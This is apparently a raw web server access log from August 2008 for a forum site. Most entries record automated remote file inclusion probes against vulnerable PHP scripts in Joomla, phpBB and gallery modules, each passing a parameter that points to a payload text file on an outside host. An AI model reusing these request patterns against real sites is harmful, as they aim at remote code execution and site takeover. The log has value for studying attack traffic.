210.245.226.25 - - [10/Aug/2008:17:51:59 -0700] "GET //include/write.php?dir=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "collegiateforum.org"
210.245.226.25 - - [10/Aug/2008:17:51:59 -0700] "GET /logs//include/write.php?dir=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "collegiateforum.org"
125.24.33.188 - - [10/Aug/2008:17:52:06 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
125.24.33.188 - - [10/Aug/2008:17:52:07 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
125.24.33.188 - - [10/Aug/2008:17:52:08 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
151.1.210.219 - - [10/Aug/2008:17:52:42 -0700] "GET /logs/access.log//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
151.1.210.219 - - [10/Aug/2008:17:52:43 -0700] "GET /logs//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
81.177.3.99 - - [10/Aug/2008:17:54:45 -0700] "GET /logs/access.log/index.php?Sayfa=http://admin.ushiva.com/id4.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "collegiateforum.org"
81.177.3.99 - - [10/Aug/2008:17:54:45 -0700] "GET /logs/access.log/index.php?Sayfa=http://www.iniciativaciudadana.com/xml/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "collegiateforum.org"
81.177.3.99 - - [10/Aug/2008:17:54:45 -0700] "GET /index.php?Sayfa=http://admin.ushiva.com/id4.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "collegiateforum.org"
81.177.3.99 - - [10/Aug/2008:17:54:45 -0700] "GET /index.php?Sayfa=http://www.iniciativaciudadana.com/xml/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "collegiateforum.org"
81.177.3.99 - - [10/Aug/2008:17:54:46 -0700] "GET /logs/index.php?Sayfa=http://www.iniciativaciudadana.com/xml/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "collegiateforum.org"
81.177.3.99 - - [10/Aug/2008:17:54:46 -0700] "GET /logs/index.php?Sayfa=http://admin.ushiva.com/id4.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "collegiateforum.org"
69.72.153.58 - - [10/Aug/2008:17:55:10 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.collegiateforum.org"
69.72.153.58 - - [10/Aug/2008:17:55:10 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.collegiateforum.org"
66.230.197.245 - - [10/Aug/2008:17:56:01 -0700] "GET /logs/access_080204.log/modules/My_eGallery/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
66.230.197.245 - - [10/Aug/2008:17:56:01 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
66.230.197.245 - - [10/Aug/2008:17:56:01 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
69.72.153.58 - - [10/Aug/2008:17:56:56 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "collegiateforum.org"
69.72.153.58 - - [10/Aug/2008:17:56:56 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "collegiateforum.org"
69.72.153.58 - - [10/Aug/2008:17:57:25 -0700] "GET /classes/core/language.php?rootdir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "collegiateforum.org"
69.72.153.58 - - [10/Aug/2008:17:57:25 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:17:59:13 -0700] "GET /logs/access_080505.log//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:17:59:13 -0700] "GET //index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:17:59:13 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:18:01:47 -0700] "GET /logs/access_080505.log//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:18:01:47 -0700] "GET //index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:18:01:47 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:18:01:55 -0700] "GET /logs/access_080505.log//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:18:01:55 -0700] "GET //index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:18:01:55 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.70.83.4 - - [10/Aug/2008:18:02:17 -0700] "GET //include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:18:03:29 -0700] "GET /logs/access_080324.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
81.177.3.99 - - [10/Aug/2008:18:03:32 -0700] "GET /logs/access_080324.log/index.php?Sayfa=http://www.iniciativaciudadana.com/xml/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
81.177.3.99 - - [10/Aug/2008:18:03:32 -0700] "GET /logs/access_080324.log/index.php?Sayfa=http://admin.ushiva.com/id4.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
81.177.3.99 - - [10/Aug/2008:18:03:33 -0700] "GET /index.php?Sayfa=http://www.iniciativaciudadana.com/xml/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
81.177.3.99 - - [10/Aug/2008:18:03:33 -0700] "GET /index.php?Sayfa=http://admin.ushiva.com/id4.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
81.177.3.99 - - [10/Aug/2008:18:03:33 -0700] "GET /logs/index.php?Sayfa=http://admin.ushiva.com/id4.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
81.177.3.99 - - [10/Aug/2008:18:03:33 -0700] "GET /logs/index.php?Sayfa=http://www.iniciativaciudadana.com/xml/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
207.44.244.37 - - [10/Aug/2008:18:06:14 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "collegiateforum.org"
207.44.244.37 - - [10/Aug/2008:18:06:14 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "collegiateforum.org"
207.44.244.37 - - [10/Aug/2008:18:06:33 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.collegiateforum.org"
207.44.244.37 - - [10/Aug/2008:18:06:33 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
64.59.70.177 - - [10/Aug/2008:18:08:04 -0700] "GET /logs/access.log/index.php?Sayfa=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
64.59.70.177 - - [10/Aug/2008:18:08:04 -0700] "GET /index.php?Sayfa=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
64.59.70.177 - - [10/Aug/2008:18:08:04 -0700] "GET /logs/index.php?Sayfa=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
64.59.70.177 - - [10/Aug/2008:18:08:05 -0700] "GET /logs/access_080324.log/index.php?Sayfa=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.59.70.177 - - [10/Aug/2008:18:08:05 -0700] "GET /index.php?Sayfa=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.59.70.177 - - [10/Aug/2008:18:08:05 -0700] "GET /logs/index.php?Sayfa=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:18:09:32 -0700] "GET /logs/access_080211.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
70.85.102.100 - - [10/Aug/2008:18:11:51 -0700] "GET //modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.collegiateforum.org"
70.85.102.100 - - [10/Aug/2008:18:11:51 -0700] "GET /logs//modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:18:11:55 -0700] "GET /logs/access_080331.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:18:11:55 -0700] "GET /?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 934 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:18:11:55 -0700] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:18:11:59 -0700] "GET /logs/access_080331.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:18:12:00 -0700] "GET /?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 934 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:18:12:00 -0700] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:18:12:53 -0700] "GET /logs/access_080324.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:18:12:56 -0700] "GET /logs/access_080324.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:18:13:04 -0700] "GET /logs/access_080331.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:18:13:04 -0700] "GET /?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 934 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:18:13:04 -0700] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.79" "www.collegiateforum.org"
70.85.102.132 - - [10/Aug/2008:18:13:25 -0700] "GET /errors.php?error=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.collegiateforum.org"
70.85.102.132 - - [10/Aug/2008:18:13:26 -0700] "GET /logs/errors.php?error=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:18:13:41 -0700] "GET /logs/access_080324.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:18:13:41 -0700] "GET /?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 934 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:18:13:41 -0700] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:18:13:54 -0700] "GET /logs/access_080324.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
202.70.83.4 - - [10/Aug/2008:18:14:58 -0700] "GET /logs/access_080331.log//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
202.70.83.4 - - [10/Aug/2008:18:15:12 -0700] "GET /logs/access.log//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "collegiateforum.org"
202.70.83.4 - - [10/Aug/2008:18:15:12 -0700] "GET /logs//include/write.php?dir=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "collegiateforum.org"
194.79.75.195 - - [10/Aug/2008:18:15:13 -0700] "GET /errors.php?error=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
74.6.17.155 - - [10/Aug/2008:18:17:27 -0700] "GET /logs/scripts.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:18:19:12 -0700] "GET /logs/access.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
129.142.67.13 - - [10/Aug/2008:18:19:13 -0700] "GET /logs/access_080324.log//vwar/convert/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
129.142.67.13 - - [10/Aug/2008:18:19:14 -0700] "GET //vwar/convert/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
129.142.67.13 - - [10/Aug/2008:18:19:14 -0700] "GET /logs//vwar/convert/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
129.142.67.13 - - [10/Aug/2008:18:19:16 -0700] "GET /logs/access_080324.log//vwar/backup/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
129.142.67.13 - - [10/Aug/2008:18:19:16 -0700] "GET //vwar/backup/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
129.142.67.13 - - [10/Aug/2008:18:19:16 -0700] "GET /logs//vwar/backup/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
194.79.75.195 - - [10/Aug/2008:18:20:23 -0700] "GET /errors.php?error=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
66.230.197.245 - - [10/Aug/2008:18:20:25 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
66.230.197.245 - - [10/Aug/2008:18:20:25 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
66.230.197.245 - - [10/Aug/2008:18:26:20 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:18:27:48 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:18:27:48 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.collegiateforum.org"
70.85.102.100 - - [10/Aug/2008:18:28:47 -0700] "GET /logs/errors.php?error=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.collegiateforum.org"
70.85.102.100 - - [10/Aug/2008:18:28:47 -0700] "GET /errors.php?error=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.collegiateforum.org"
194.79.75.195 - - [10/Aug/2008:18:29:02 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.collegiateforum.org"
194.79.75.195 - - [10/Aug/2008:18:29:02 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.collegiateforum.org"
194.79.75.195 - - [10/Aug/2008:18:29:18 -0700] "GET /logs/access_080331.log/errors.php?error=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
194.79.75.195 - - [10/Aug/2008:18:29:18 -0700] "GET /logs/errors.php?error=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
194.79.75.195 - - [10/Aug/2008:18:30:10 -0700] "GET /logs/access_080324.log/errors.php?error=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
74.6.17.166 - - [10/Aug/2008:18:36:26 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
74.6.87.25 - - [10/Aug/2008:18:36:26 -0700] "GET /Jonathan_Fantini_Porter/publish.php HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:18:37:43 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
64.59.70.177 - - [10/Aug/2008:18:38:08 -0700] "GET /logs/components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
64.59.70.177 - - [10/Aug/2008:18:38:08 -0700] "GET /logs/access.log/components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
64.59.70.177 - - [10/Aug/2008:18:38:08 -0700] "GET /components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
219.117.239.114 - - [10/Aug/2008:18:39:06 -0700] "GET /logs/access_080324.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
219.117.239.114 - - [10/Aug/2008:18:39:13 -0700] "GET /?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 934 "-" "libwww-perl/5.65" "www.collegiateforum.org"
